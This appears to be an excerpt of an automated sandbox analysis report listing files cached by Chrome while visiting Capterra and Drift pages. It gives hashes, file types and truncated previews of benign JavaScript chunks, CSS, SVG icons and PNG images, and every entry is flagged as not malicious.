                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>1</title>. <defs>. <path d="M8.97826087,0 L109.021739,0 C113.980296,0 118,4.01970431 118,8.97826087 L118,109.021739 C118,113.980296 113.980296,118 109.021739,118 L8.97826087,118 C4.01970431,118 0,113.980296 0,109.021739 L0,8.97826087 C0,4.01970431 4.01970431,0 8.97826087,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23865), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23865
                                                                                                                                                                                                        Entropy (8bit):5.17066773670714
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:dEiPYBr8tDTHrmZjlvbbPal9pGh6rk4scHWeqBEcpAODhBwXTzWDg8GUeAwkO06o:OigBgtnQvbbPkGh6Q4scQEcpAODySDig
                                                                                                                                                                                                        MD5:4049F38C00ADD1738DC4806148FF8829
                                                                                                                                                                                                        SHA1:0A631D2CCDE970A13F60E147A5B5AEACB6A1B2E0
                                                                                                                                                                                                        SHA-256:C501DE88FBB90A445F1754A529BC772E7047071BF653C8C3F0330F7BB736D140
                                                                                                                                                                                                        SHA-512:8ADA588F646C3D9456EA5C8F28C994078B6D2F88527E998C3329F53BD915403283F498E31A9532B7488DC23C74F0CB60AFC93F47891D9E73CF6FB96085A97EC1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/11.639238ba.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[11],{"0B8E":function(t,n,e){"use strict";var r=e("rAc1"),u=e("PYcH");function hasOrAdd(t,n,e){var r,c=typeof t;switch(c){case"string":case"number":return 0===t&&1/t===-1/0?!!e._items["-0"]||(n&&(e._items["-0"]=!0),!1):null!==e._nativeSet?n?(r=e._nativeSet.size,e._nativeSet.add(t),e._nativeSet.size===r):e._nativeSet.has(t):c in e._items?t in e._items[c]||(n&&(e._items[c][t]=!0),!1):(n&&(e._items[c]={},e._items[c][t]=!0),!1);case"boolean":if(c in e._items){var a=t?1:0;return!!e._items[c][a]||(n&&(e._items[c][a]=!0),!1)}return n&&(e._items[c]=t?[!1,!0]:[!0,!1]),!1;case"function":return null!==e._nativeSet?n?(r=e._nativeSet.size,e._nativeSet.add(t),e._nativeSet.size===r):e._nativeSet.has(t):c in e._items?!!Object(u.a)(t,e._items[c])||(n&&e._items[c].push(t),!1):(n&&(e._items[c]=[t]),!1);case"undefined":return!!e._items[c]||(n&&(e._items[c]=!0),!1);case"object":if(null===t)return!!e._items.null||(n&&(e._items.null=!0),!1);default:return(c
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):154163
                                                                                                                                                                                                        Entropy (8bit):5.3389309227844475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:99Q6OWJQiucWeAtoo/GuK0lHLa4Vmuaaer64fL/KkHS3eS3NHuxlHgu898d:99Q6OWJY7oo/GuK0tLamHuYu8Q
                                                                                                                                                                                                        MD5:C26F2C55E7E2055DAB5AFB6D04E2CD62
                                                                                                                                                                                                        SHA1:D7958BD655F4812E91A9A3F5F9667475BBF5FCC3
                                                                                                                                                                                                        SHA-256:F184F84EA89EF161D4E3752DD0DFC06153D79EED5ABA29895AB1251F0AD64019
                                                                                                                                                                                                        SHA-512:F32DEA52658BA038CDEDA266FC7E6FCC6509939912B382D4EFBB8C79DE0721A4A997504CD0F8A425EF3708A5732603DCE3D56F024E1AB2C34D6996C6EB7F87E2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6956],{74176:function(e,t,l){Promise.resolve().then(l.bind(l,245)),Promise.resolve().then(l.bind(l,8031)),Promise.resolve().then(l.bind(l,79034)),Promise.resolve().then(l.bind(l,39038)),Promise.resolve().then(l.bind(l,36141)),Promise.resolve().then(l.bind(l,79899)),Promise.resolve().then(l.bind(l,88984)),Promise.resolve().then(l.bind(l,27752)),Promise.resolve().then(l.bind(l,62725)),Promise.resolve().then(l.bind(l,36983)),Promise.resolve().then(l.bind(l,7663)),Promise.resolve().then(l.bind(l,64993)),Promise.resolve().then(l.bind(l,77073)),Promise.resolve().then(l.bind(l,97341)),Promise.resolve().then(l.bind(l,10857)),Promise.resolve().then(l.bind(l,37118)),Promise.resolve().then(l.bind(l,91886)),Promise.resolve().then(l.bind(l,20300)),Promise.resolve().then(l.bind(l,35350)),Promise.resolve().then(l.bind(l,78228)),Promise.resolve().then(l.bind(l,13691)),Promise.resolve().then(l.bind(l,79930)),Promise.resolve().then(l.bind(l,95741)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (52555), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):52555
                                                                                                                                                                                                        Entropy (8bit):5.3314258505062355
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:weXreezYoNbmP+FUJcBtopGTaY/zcAcbcVvPxaTLYqj6cw68Kv84d3ltnakthU2r:3SP+qjJ7kJGabI
                                                                                                                                                                                                        MD5:D6435A9A90528568FD8EBAB2F8731A63
                                                                                                                                                                                                        SHA1:59D986AE6C1D0F4B8DC9578959C185649AFC78DD
                                                                                                                                                                                                        SHA-256:266BB1AEEED98CE42DB341998C42B22B55462456FC7F69410CA1B19AFE1D83AE
                                                                                                                                                                                                        SHA-512:1AE492AE40B0834A6B15C994AC5F777CE1BBCCE9E80070973D3DF648BD86D6E46CA1A0DD004AEEC11988464C2A73238EC9180B6F090AF344508684F340A6CDBB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/24.f9f5e493.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[24],{"+f1A":function(e,t,n){"use strict";n.d(t,"q",function(){return s}),n.d(t,"w",function(){return d}),n.d(t,"m",function(){return l}),n.d(t,"b",function(){return f}),n.d(t,"a",function(){return b}),n.d(t,"t",function(){return O}),n.d(t,"u",function(){return p}),n.d(t,"r",function(){return v}),n.d(t,"k",function(){return E}),n.d(t,"s",function(){return g}),n.d(t,"e",function(){return j}),n.d(t,"g",function(){return _}),n.d(t,"h",function(){return I}),n.d(t,"f",function(){return C}),n.d(t,"l",function(){return h}),n.d(t,"p",function(){return m}),n.d(t,"c",function(){return T}),n.d(t,"v",function(){return y}),n.d(t,"o",function(){return S}),n.d(t,"i",function(){return R}),n.d(t,"j",function(){return A}),n.d(t,"n",function(){return N}),n.d(t,"d",function(){return x});var r=n("mj2O"),a=n.n(r),c=n("7SM1"),i=n("QtlZ"),o=n("NFvl"),u=n("LVcX"),s=function getSession(){if(!i.a||!i.a.getState)return{};var e=Object(i.b)().session;return void 0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17003), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):17003
                                                                                                                                                                                                        Entropy (8bit):5.252540905926642
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:RxFVDGRHhfiYI8Z3xtsH7aK4N9eke+Kt/y6CtVeAkS486a:RAfM94N9ekjKt/y6WeC
                                                                                                                                                                                                        MD5:65E5C965272E021AE33FF8BC39565EF5
                                                                                                                                                                                                        SHA1:C5A2C0CDF9C821B6EE43A1EEB52680FFEEA15557
                                                                                                                                                                                                        SHA-256:B84595CC8461BB6E8376FE94F0DD23D6657172103B03653534089C5992B058A1
                                                                                                                                                                                                        SHA-512:C177A508A3ED03C91567765E51EFB6E39E9DC20200BC6A30C708B7FA339B1DAC17CC46BEBCA5B5267C9CF10EFD24FE054B078352F8460A3E12422A6AD7CC1B90
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[21],{"2SVd":function(e,t,r){"use strict";e.exports=function isAbsoluteURL(e){return/^([a-z][a-z\d\+\-\.]*:)?\/\//i.test(e)}},"5oMp":function(e,t,r){"use strict";e.exports=function combineURLs(e,t){return t?e.replace(/\/+$/,"")+"/"+t.replace(/^\/+/,""):e}},"9rSQ":function(e,t,r){"use strict";var n=r("xTJ+");function InterceptorManager(){this.handlers=[]}InterceptorManager.prototype.use=function use(e,t){return this.handlers.push({fulfilled:e,rejected:t}),this.handlers.length-1},InterceptorManager.prototype.eject=function eject(e){this.handlers[e]&&(this.handlers[e]=null)},InterceptorManager.prototype.forEach=function forEach(e){n.forEach(this.handlers,function forEachHandler(t){null!==t&&e(t)})},e.exports=InterceptorManager},CgaS:function(e,t,r){"use strict";var n=r("JEQr"),o=r("xTJ+"),a=r("9rSQ"),s=r("UnBK");function Axios(e){this.defaults=e,this.interceptors={request:new a,response:new a}}Axios.prototype.request=function request(e){
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (414), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):414
                                                                                                                                                                                                        Entropy (8bit):4.611979777463908
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:qvki/nGrS1r6avkMkhYHvkMkTZpV6avkMkqHLgbhWvkA3RG55N75AkMkp:qtnl1Wa2eg8adSWZGHjV
                                                                                                                                                                                                        MD5:8ADDF30C2AD568E82C9C2DCA8F0BDEAD
                                                                                                                                                                                                        SHA1:E12D5AA5DFE9CF2BD176865840A5485CB234E028
                                                                                                                                                                                                        SHA-256:6C13BDD31C91E06291237A6775FAC55467FBDB7340C724D763FB7CCC7D304227
                                                                                                                                                                                                        SHA-512:29287464BFADB193A1D54DB6C9F5AFBE5E56AD296E85FDAC6B8CF5064349196B903C3FD3889D683FEAAFF623C56B531D35E25A4090BCFE5A99439B1E7500F7FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/css/01678b771918639e.css
                                                                                                                                                                                                        Preview:.thin-scrollbar{scrollbar-width:thin;scrollbar-color:#a4a2a2 #fff}.thin-scrollbar::-webkit-scrollbar{width:4px}.thin-scrollbar::-webkit-scrollbar-track{background:#fff}.thin-scrollbar::-webkit-scrollbar-thumb{background-color:#a4a2a2;border-radius:10px;border:4px solid #fff}.tooltip .thin-scrollbar.tooltip-content.color-mode-light.is-top:after{border:none!important}.no-scrollbar::-webkit-scrollbar{display:none}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 1452 x 1284, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):717659
                                                                                                                                                                                                        Entropy (8bit):7.981418078994665
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:O2CxoWNk9zmdjygD+DPK8ikifjanEbknEPuO4vVQd1jZpR+:9pWNndyg67KjfOnWnuOxd5ZpR+
                                                                                                                                                                                                        MD5:512B7392F69641099ED82D088C042C1C
                                                                                                                                                                                                        SHA1:EC5B6AE073E3228E60E09F5EA32DDBD9A918583D
                                                                                                                                                                                                        SHA-256:B812EC7F63E86AA3454F6EB0F3744CE0A3A6BE1DBE4F483CC2B72380F16A4E59
                                                                                                                                                                                                        SHA-512:38FF5682B271FF7117ED09D48D3B9CE828CC359A229D2DC9FD893A23EF4623D5F1150F32224C38B1F1243571188FAE53D128E377EBC015A777014688539D279F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.............0.W.....gAMA......a....8eXIfMM.*.......i............................................ .....@.IDATx.....%y].......RY{U..U.U...Mwu...9"..n.A...{.y3...q.{s.9GqF.eu}.sAYTFv.Eiph..^.^.k..o.%..~.fdFF.7..q.7 *".._?Q.u....e..@....@....@..d.X..>.G.......R....@ ..|...C.K. .... ...........g...I. w..i....hG....Q....@....@...:....N.(..... ..+Y.E...Z...b.XdE....@....@.......-6.!.@...b..!.....-.>8...f.. .... .....C..3..L.. .o......=...I.>H..cg.. .... .....D../z.J.. .C...1|(t....C.......... .... ......{.A......A..u...}@.......P=N..... .... .@...^.o.4..... p...D..@ ..|.L.s... .... .....I..#..4.....I..u...}A..D..A3...N#.... .... 0......;.".@...\'..e......8....... .... ...q.H...I.s....?..%...p..<..K.. ......V)8A....@....@................]..{`8.....:..@.3.>.u.Gi..@....@....Y n./.?......I..[.8n.I.... 0..|......@....@.....@ ..+....R...b$...q....GBW.@..p.>........ .... ..(.....A.=...#0J.......Qz.....,....?<..... .... .@....=B...U.=`.J..h".@o/.l2...A...o.A.........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (11084), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11084
                                                                                                                                                                                                        Entropy (8bit):5.26714858103651
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:sANzVNUBOebwvXDA+mJ4fXOrTIjDJfiRxug9xx+EMZajp:PNbUBOjHmJcOgjDJaR1bMZip
                                                                                                                                                                                                        MD5:65F1D21D5FCC9D21DA758ADABABD0C3C
                                                                                                                                                                                                        SHA1:E0661D07D64C00008BC9D013D16EEC0A0F156DC7
                                                                                                                                                                                                        SHA-256:D2B82E612D2A812E8BE2A57300DAB8923C4F2EDBE7A799E7DA70791B595646FE
                                                                                                                                                                                                        SHA-512:DE7D7DC739CED2E6CFA52C1809144180787ADC3AD5F9B7597C72B9D9BD5EB2F21DE06B1FC12B5034F2458DE428B368772700A6665D3F2E02F148A300239E6183
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.min.js
                                                                                                                                                                                                        Preview:window.Modernizr=function(e,t,n){function r(e){b.cssText=e}function o(e,t){return r(S.join(e+";")+(t||""))}function a(e,t){return typeof e===t}function i(e,t){return!!~(""+e).indexOf(t)}function c(e,t){for(var r in e){var o=e[r];if(!i(o,"-")&&b[o]!==n)return"pfx"==t?o:!0}return!1}function s(e,t,r){for(var o in e){var i=t[e[o]];if(i!==n)return r===!1?e[o]:a(i,"function")?i.bind(r||t):i}return!1}function u(e,t,n){var r=e.charAt(0).toUpperCase()+e.slice(1),o=(e+" "+k.join(r+" ")+r).split(" ");return a(t,"string")||a(t,"undefined")?c(o,t):(o=(e+" "+T.join(r+" ")+r).split(" "),s(o,t,n))}function l(){p.input=function(n){for(var r=0,o=n.length;o>r;r++)j[n[r]]=!!(n[r]in E);return j.list&&(j.list=!(!t.createElement("datalist")||!e.HTMLDataListElement)),j}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" ")),p.inputtypes=function(e){for(var r,o,a,i=0,c=e.length;c>i;i++)E.setAttribute("type",o=e[i]),r="text"!==E.type,r&&(E.value=x,E.style.cssText="position:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14567), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):14567
                                                                                                                                                                                                        Entropy (8bit):5.57400052980633
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:lLwx/G17xUsFhYXNhEpY4MT+ZgNP8SWu6:l8ML6EXI+ZgNP8Sj6
                                                                                                                                                                                                        MD5:D5B8193E40D3C17F765A377C2724D3A8
                                                                                                                                                                                                        SHA1:E67141DC10B5A2B92EC6841BD0B2EA253D94BF43
                                                                                                                                                                                                        SHA-256:C6A776094257F74C40D605B559E466BAAF8A85F6080A80BAB0C9AC77D30A0829
                                                                                                                                                                                                        SHA-512:1E9505561B651F32C7C2710993A9159F219BFE11CCC09848D805A2FE6BA2C3C0FCF91E36BF80D5A7E449E1B63267F7EA093382147B07339E6BAD8BBB80D97157
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/app/not-found-c0d0c703bba0d3a2.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9160],{85001:function(e,t,n){Promise.resolve().then(n.bind(n,56155))},56155:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return u}});var r=n(27573),i=n(34617),o=n(8558),a=n(16311),c=n(65880);function u(){return(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)(o.Z,{useGdmAnalytics:!0}),(0,r.jsx)(i.ScreenContainer,{children:(0,r.jsxs)("div",{"data-testid":"404-page-error",className:"p-xl flex flex-col items-center md:flex-row",children:[(0,r.jsxs)("div",{className:"w-full md:w-7/12",children:[(0,r.jsx)("h1",{className:"mb-xl leading-xl text-xl font-bold md:text-3xl",children:"Page not found"}),(0,r.jsxs)("p",{className:"mb-xl text-lg",children:["Unfortunately, we couldn't find this page. Try checking your URL or return to our ",(0,r.jsx)(i.Link,{href:"".concat(a.nw,"/"),children:"home page"}),"."]}),(0,r.jsx)("p",{className:"font-bold",children:"Here are some other helpful links:"}),(0,r.jsxs)(i.List,{className:"ml-2xl mb
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):75961
                                                                                                                                                                                                        Entropy (8bit):5.284364477342943
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:QsOblXdRFlP6SupyNG6jtspnJWuUTzHUBDnBIuqoci+4cW/mK5NtUO6PnUZHBO8n:QDvFlP6Supyqpcu23O/ziSO87QRi8k
                                                                                                                                                                                                        MD5:6D77A76055D81227033363AF2F18CAF8
                                                                                                                                                                                                        SHA1:B1B94517954F8F8889A0822886DEA6F5AD7C931F
                                                                                                                                                                                                        SHA-256:19473EEBFB0672867A4438E2A015DE79FDED34B9F5AE5598BADE57EB01CF0563
                                                                                                                                                                                                        SHA-512:8E576150D0CB1FCB21DA5EC65C73EE2CB2E48A5F762C3926243471CAE4D0334F4D5B464A08C189A223E8E56D47C28323EFA4A053405D06BF35776C5154762FC7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/20.8c21ea18.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[20],{"11Hm":function(e,t,n){"use strict";function _extends(){return(_extends=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}var o=n("QS52"),r=(n("c58o"),n("h7FZ"));function addLeadingSlash(e){return"/"===e.charAt(0)?e:"/"+e}function stripBasename(e,t){return function hasBasename(e,t){return new RegExp("^"+t+"(\\/|\\?|#|$)","i").test(e)}(e,t)?e.substr(t.length):e}function stripTrailingSlash(e){return"/"===e.charAt(e.length-1)?e.slice(0,-1):e}function createPath(e){var t=e.pathname,n=e.search,o=e.hash,r=t||"/";return n&&"?"!==n&&(r+="?"===n.charAt(0)?n:"?"+n),o&&"#"!==o&&(r+="#"===o.charAt(0)?o:"#"+o),r}function createLocation(e,t,n,r){var i;"string"===typeof e?(i=function parsePath(e){var t=e||"/",n="",o="",r=t.indexOf("#");-1!==r&&(o=t.substr(r),t=t.substr(0,r));var i=t.indexOf("?");return-1!==i&&(
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):110652
                                                                                                                                                                                                        Entropy (8bit):6.034917564422843
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:xRRO9VL43le3xutZ1joz/u7RqiQ+HhDEMwMRIK/iOq:5uVLQ7joq9bQ+HdyBKqOq
                                                                                                                                                                                                        MD5:51D8D7491DCD6E2B11BB7AD8D1F136C1
                                                                                                                                                                                                        SHA1:2504150B5D2F765D08DB85B5D963DF2E573E2E6D
                                                                                                                                                                                                        SHA-256:580BE7F1C4ACDD9C8CBD222A963E60BF194F6D234C8C0F5B2BA0D48B0BC1F990
                                                                                                                                                                                                        SHA-512:7DF92843023E2BE3BFD1F492E44BB0718B43D39EE7D10E0CFD09BFF61F12183DE5FF7772724CDC4547504E7990524C2E0E5BB6F7A8860D6B362EE596385A903E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>4</title>. <defs>. <path d="M7.94230769,0 L110.057692,0 C114.444108,0 118,3.55589228 118,7.94230769 L118,110.057692 C118,114.444108 114.444108,118 110.057692,118 L7.94230769,118 C3.55589228,118 0,114.444108 0,110.057692 L0,7.94230769 C0,3.55589228 3.55589228,0 7.94230769,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3155
                                                                                                                                                                                                        Entropy (8bit):7.83975530887515
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:ZpTcgL+bBbtmcmAnUI05w6CqRa/t8rfs1O39XRlcbeeyYq8F4L:fTcX7menxFR/t87sgBQyeyj8mL
                                                                                                                                                                                                        MD5:21F203522036C81F3E36D215D08F26E9
                                                                                                                                                                                                        SHA1:84AC5F51C179638BA5810C53BDD769A501007D7D
                                                                                                                                                                                                        SHA-256:4B2BECFDC952C3EE6B9DDC65BF001770B675A27CA2469494FA39EE87392662F6
                                                                                                                                                                                                        SHA-512:739E7283616ADDD5F4126242C349D342530EB30E83FECA1B596B92CEE2859CB958A851AE91771DCFCC791F5EF36C20537F87668737A1ADE75CA6AE79ADDD2317
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........PLTE.....................................................................................................................`........................................................t...........U........m.............V....R..0..........;........6..4.......?..D..O..p.....P.....y..h..................k..c........w......i..I..~..7....n.......|..D..z................r..s.....Q..t.....W..h..2.........(......................`..d.......V....".............9..N...............G..[......Y.........Y.....S..$.....x...........$....J.....H.............+..u........^..A........B.......~....^.......f..................=.....O.....Z......................[.....9.....U................\..,....'..............f..........K...........e.......L......k.....IDAThC.y\T.......y....C9..b\D....H....H..D......A.xDQ[0..5.I.5.O....M..$...6m..........K^......}s..73....J....J....J....J....J....J....J....J....J....J....J....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2444), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2444
                                                                                                                                                                                                        Entropy (8bit):5.2160766057354975
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:JvgIAmIyeXz9ATAUCYeVlvIH8utrhU3j/Zj/7pUMOZ/Ee:Jvgc3Kz9ATAUkgMU1
                                                                                                                                                                                                        MD5:1B15ADF475F9BE194DC9B34C30BF5777
                                                                                                                                                                                                        SHA1:80C73C663714A8B55CB7E9229CA74AE1FC5BF773
                                                                                                                                                                                                        SHA-256:000178BCE105257DA482A4615DF1B69BAE658A5A6DF4EF9497BE208C8C2CF170
                                                                                                                                                                                                        SHA-512:1BC0B269CBB01326969C4AAD21AB6873D3008ECEF761F0678D195C010336734FD366DE8A18A163C249161935C3DB18C72A38DD61B64D60E038A4245B82BF16C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/css/d1857e6f465dd807.css
                                                                                                                                                                                                        Preview:.search-page-toolbar-mobile_SearchPageToolbarMobile__qbgxN{position:sticky;top:0;background:"transparent";box-shadow:none;display:flex;justify-content:space-between;z-index:1;padding:16px 16px 8px;transition:all .125s linear}.search-page-toolbar-mobile_SearchPageToolbarMobile--isSticky__pYLI3{background:#fff;box-shadow:0 6px 6px 0 rgba(0,0,0,.25)}.grid-item_card__C0qrt>div{max-width:100%}.grid-item_subtitle__K__UR{line-clamp:2;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden;text-overflow:ellipsis}.skeleton_root__GQ2MO{display:block;background-color:var(--color-primary-10);height:1.2em}.skeleton_text__8oMWa{margin-top:0;margin-bottom:0;height:auto;transform:scaleY(.6)}.skeleton_circle__Il3Kt{border-radius:50%}.skeleton_pulse__H6NZv{animation:skeleton_pulse__H6NZv 1.5s ease-in-out .5s infinite}@keyframes skeleton_pulse__H6NZv{0%{opacity:1}50%{opacity:.5}to{opacity:1}}.skeleton_wave__MEi23{position:relative;overflow:hidden}.skeleton_wave__MEi23:after{a
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 200 x 42, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5606
                                                                                                                                                                                                        Entropy (8bit):7.956795005736008
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:2EKPEIQck1KXr4jEEzuPM12zkeN+F7/VZDR65mOmW7IjbWUCOGHG1cYVxRUy:2E78rOELlAFbXUYsIjbPV+2Sy
                                                                                                                                                                                                        MD5:48271C88F3918900A92BEF0C3074F502
                                                                                                                                                                                                        SHA1:8514372D0F82E4FB88DA10F679F10D37C89A20DA
                                                                                                                                                                                                        SHA-256:0236A42791F0424882AA9A4CDBCADB216ABA9D660B5E1C1DD4AFFD987C7B0359
                                                                                                                                                                                                        SHA-512:74D4C9D0C943C6D3BEA3DF722DB4C7D4A35EC3168274107D37203B9BCEE4AEEDFA4D62CE19DA6DF7514DD71ADB6CB8BFBB37A51591248A9677D4969EDC774F98
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.......*.............gAMA......a....8eXIfMM.*.......i......................................*.........YIDATx....\.y......N....H. ....E..D,CpB...$......d....2a.......@`....i..BH ...].:]......n....w.+....m}......[.0.)...O.8zG.7..j...+.A.']..;~j.O.._..Ia\.$E).".}m.4.g...q.....4.khHJ....8...IY...u...b......]..6....8""eqb.D9".:....7<`..8....$.....}R..*.p8?....o4!..q".3.'..6...."c..dhtX..:etd.JS.....D..4...>-...}...8._.-.KjT....W..Jj.[...+..%'......^.b...e....E"c/...y.....N.[q.9.'.r.......'fH...5).......g..M........iE..-.6.>T"....I.=.(.h..S+R......4...W[.'...(....m. ..f8.....c..a..Q.......@.....+..A./..p.@..$..NRD4k.%.t.L..D..Qv.c.EO...i.`S...JC;...b. h....+.g....;X..c.[2...D....r.]cdDV..kS..P....H...[2.....`\T....... 0.0>S...I..9..`....o..*.......<s...\..1l..lEr.|w..I....zX.IC1.~.&....4#.$...Q k3..u..@.1...2w].....08..<)....D..f,t..r6.!TS..++.s.....6e....../.....")..}w.\m.ek.U...':.XI...9K$...%{.........r....LY..%+l...b...9.
